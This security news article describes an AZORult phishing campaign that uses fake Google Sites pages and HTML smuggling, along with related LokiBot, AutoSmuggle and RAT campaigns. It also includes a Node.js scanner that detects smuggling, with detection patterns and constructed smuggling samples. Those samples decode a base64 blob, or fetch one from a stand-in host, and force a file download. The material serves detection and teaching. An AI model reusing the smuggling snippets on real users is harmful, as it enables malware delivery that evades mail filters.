Cybersecurity researchers have discovered a new malware campaign that leverages bogus Google Sites pages and HTML smuggling to distribute a commercial malware called AZORult in order to facilitate information theft.
“It uses an unorthodox HTML smuggling technique where the malicious payload is embedded in a separate JSON file hosted on an external website,” Netskope Threat Labs researcher Jan Michael Alcantara said in a report published last week.
The phishing campaign has not been attributed to a specific threat actor or group. The cybersecurity company described it as widespread in nature, carried out with the intent of collecting sensitive data for sale on underground forums.
AZORult, also called PuffStealer and Ruzalto, is an information stealer first detected around 2016. It is typically distributed via phishing and malspam campaigns, trojanized installers for pirated software or media, and malvertising.
Once installed, it is capable of harvesting credentials, cookies, and history from web browsers, taking screenshots, collecting documents matching a list of specific extensions (.TXT, .DOC, .XLS, .DOCX, .XLSX, .AXX, and .KDBX), and stealing data from 137 cryptocurrency wallets. AXX files are encrypted files created by AxCrypt, while KDBX refers to a password database created by the KeePass password manager.
The latest attack activity involves the threat actor creating counterfeit Google Docs pages on Google Sites that then use HTML smuggling to deliver the payload.
HTML smuggling is the name given to a stealthy technique in which legitimate HTML5 and JavaScript features are abused to assemble and launch the malware by “smuggling” an encoded malicious payload inside the page or a resource it loads.
As a result, when a victim is tricked into opening the rogue page from a phishing email, the browser decodes the embedded data and writes the payload to the host device, effectively bypassing traditional security controls such as email gateways, which typically inspect only attachments rather than the content a linked page assembles client-side.
The AZORult campaign takes this approach a notch higher by adding a CAPTCHA barrier, which not only lends a veneer of legitimacy but also serves as an additional layer of protection against automated URL scanners, since the download is only triggered after a human solves the challenge.
The downloaded file is a shortcut file (.LNK) that masquerades as a PDF bank statement; launching it kicks off a chain of intermediate batch and PowerShell scripts retrieved from an already compromised domain.
One of the PowerShell scripts (“agent3.ps1”) is designed to fetch the AZORult loader (“services.exe”), which, in turn, downloads and executes another PowerShell script (“sd2.ps1”) that contains the stealer malware.
“It executes the fileless AZORult infostealer stealthily by using reflective code loading, bypassing disk-based detection and minimizing artifacts,” Michael Alcantara said. “It uses an AMSI bypass technique to evade being detected by a variety of host-based anti-malware products, including Windows Defender.”
“Unlike common smuggling files where the blob is already inside the HTML code, this campaign copies an encoded payload from a separate compromised website. Using legitimate domains like Google Sites can help trick the victim into believing the link is legitimate.”
The findings come as Cofense disclosed the use of malicious SVG files by threat actors in recent campaigns to disseminate Agent Tesla and XWorm using an open-source tool called AutoSmuggle that simplifies the process of crafting HTML or SVG smuggled files.
AutoSmuggle “takes a file such as an exe or an archive and ‘smuggles’ it into the SVG or HTML file so that when the SVG or HTML file is opened, the ‘smuggled’ file is delivered,” the company said.
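As an added example (not code from the Netskope or Cofense reports, and not a sample taken from either campaign), the following Node.js script ties together the three smuggling variants discussed above: the classic inline blob, the AZORult variant that fetches its encoded payload from a separate JSON file, and AutoSmuggle-style SVG carriers. It scans a document for the JavaScript features a smuggling page needs (base64 decoding, Blob construction, object URLs, forced download, or a fetch of an external .json file), decodes any inline base64 blob, and identifies the payload from its magic bytes (PE, ZIP, LNK). The sample documents, the indicator names and the example.invalid URL are constructed for illustration.

```javascript
// Added example, not from the Netskope/Cofense write-ups: a static scanner for
// HTML/SVG smuggling indicators, run over constructed sample documents.

// Browser features a smuggling page typically abuses (indicator names are our own).
const INDICATORS = [
  { name: "base64-decode", re: /\batob\s*\(/ },
  { name: "blob-construct", re: /new\s+Blob\s*\(/ },
  { name: "object-url", re: /URL\.createObjectURL\s*\(/ },
  { name: "ms-save-blob", re: /msSaveOrOpenBlob\s*\(/ },
  { name: "forced-download", re: /\.download\s*=/ },
  // AZORult-style variant: the blob lives in a separate JSON file fetched at runtime.
  { name: "remote-json-fetch", re: /fetch\s*\(\s*["'`][^"'`]+\.json["'`]/ },
];
const DROP_INDICATORS = ["blob-construct", "object-url", "ms-save-blob", "forced-download"];

// A quoted base64 run of 40+ characters is treated as a candidate inline blob.
const INLINE_B64 = /["'`]([A-Za-z0-9+/]{40,}={0,2})["'`]/g;

// Identify the decoded payload from its leading bytes.
function identifyPayload(bytes) {
  if (bytes.length >= 2 && bytes[0] === 0x4d && bytes[1] === 0x5a) return "PE executable (MZ)";
  if (bytes.length >= 2 && bytes[0] === 0x50 && bytes[1] === 0x4b) return "ZIP archive (PK)";
  // Shell link: HeaderSize 0x4C followed by the LNK CLSID {00021401-0000-0000-C000-000000000046}.
  const lnk = [0x4c, 0x00, 0x00, 0x00, 0x01, 0x14, 0x02, 0x00];
  if (bytes.length >= lnk.length && lnk.every((b, i) => bytes[i] === b)) return "Windows shortcut (LNK)";
  return "unknown";
}

function scanForSmuggling(markup) {
  const indicators = INDICATORS.filter((i) => i.re.test(markup)).map((i) => i.name);
  const payloads = [];
  for (const m of markup.matchAll(INLINE_B64)) {
    const bytes = Buffer.from(m[1], "base64");
    payloads.push({ size: bytes.length, type: identifyPayload(bytes) });
  }
  // Verdict: the page both obtains an encoded blob (inline decode or remote JSON) and drops it to disk.
  const obtains = indicators.includes("base64-decode") || indicators.includes("remote-json-fetch");
  const drops = DROP_INDICATORS.some((n) => indicators.includes(n));
  return { kind: /<svg[\s>]/i.test(markup) ? "svg" : "html", indicators, payloads, suspicious: obtains && drops };
}

// Constructed sample 1: classic inline smuggling, a fake PE (just an "MZ" header) embedded in the page.
const fakeExe = Buffer.concat([Buffer.from("MZ"), Buffer.alloc(62)]).toString("base64");
const INLINE_SAMPLE = `<html><body><script>
  const bytes = Uint8Array.from(atob("${fakeExe}"), (c) => c.charCodeAt(0));
  const blob = new Blob([bytes], { type: "application/octet-stream" });
  const a = document.createElement("a");
  a.href = URL.createObjectURL(blob); a.download = "payload.bin"; a.click();
</script></body></html>`;

// Constructed sample 2: the blob is not in the page; it is fetched from an external JSON file.
const REMOTE_JSON_SAMPLE = `<html><body><script>
  fetch("https://example.invalid/page-data.json").then((r) => r.json()).then((j) => {
    const bytes = Uint8Array.from(atob(j.blob), (c) => c.charCodeAt(0));
    const a = document.createElement("a");
    a.href = URL.createObjectURL(new Blob([bytes])); a.download = "payload.bin"; a.click();
  });
</script></body></html>`;

// Constructed sample 3: an SVG carrier with a fake .LNK (valid header, zero body) smuggled inside.
const lnkHeader = Buffer.from([0x4c, 0, 0, 0, 0x01, 0x14, 0x02, 0x00, 0, 0, 0, 0, 0xc0, 0, 0, 0, 0, 0, 0, 0x46]);
const fakeLnk = Buffer.concat([lnkHeader, Buffer.alloc(28)]).toString("base64");
const SVG_SAMPLE = `<svg xmlns="http://www.w3.org/2000/svg"><script><![CDATA[
  const bytes = Uint8Array.from(atob("${fakeLnk}"), (c) => c.charCodeAt(0));
  const a = document.createElement("a");
  a.href = URL.createObjectURL(new Blob([bytes])); a.download = "file.lnk"; a.click();
]]></script></svg>`;

// Constructed sample 4: benign use of atob with no download machinery; must not be flagged.
const BENIGN_SAMPLE = `<html><body><script>
  document.title = atob("SGVsbG8=");
</script></body></html>`;

for (const [name, doc] of Object.entries({ INLINE_SAMPLE, REMOTE_JSON_SAMPLE, SVG_SAMPLE, BENIGN_SAMPLE })) {
  console.log(name, JSON.stringify(scanForSmuggling(doc)));
}
```

Run it with `node smuggle-scan.js`. The heuristic is deliberately static: it will flag all three smuggling samples and leave the benign page alone, but trivial obfuscation (string splitting, `window["at" + "ob"]`) defeats the regexes, and in the remote-JSON variant there is no blob on the page to decode, so a scanner sees only the fetch and has to retrieve the referenced JSON in a sandbox, or block the resulting download at the proxy, to get at the payload itself.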
Phishing campaigns have also been observed using shortcut files packed inside archive files to propagate LokiBot, an information stealer analogous to AZORult with features to harvest data from web browsers and cryptocurrency wallets.
“The LNK file executes a PowerShell script to download and execute the LokiBot loader executable from a URL. LokiBot malware has been observed using image steganography, multi-layered packing and living-off-the-land (LotL) techniques in past campaigns,” SonicWall disclosed last week.
In another instance highlighted by Docguard, malicious shortcut files have been found to initiate a series of payload downloads and ultimately deploy AutoIt-based malware.
That’s not all. Users in the Latin American region are being targeted as part of an ongoing campaign in which the attackers impersonate Colombian government agencies to send booby-trapped emails with PDF documents that accuse the recipients of violating traffic rules.
Present within the PDF file is a link that, when clicked, results in the download of a ZIP archive containing a VBScript. When executed, the VBScript drops a PowerShell script responsible for fetching one of several remote access trojans, such as AsyncRAT, njRAT, and Remcos.
Some parts of this article are sourced from:
thehackernews.com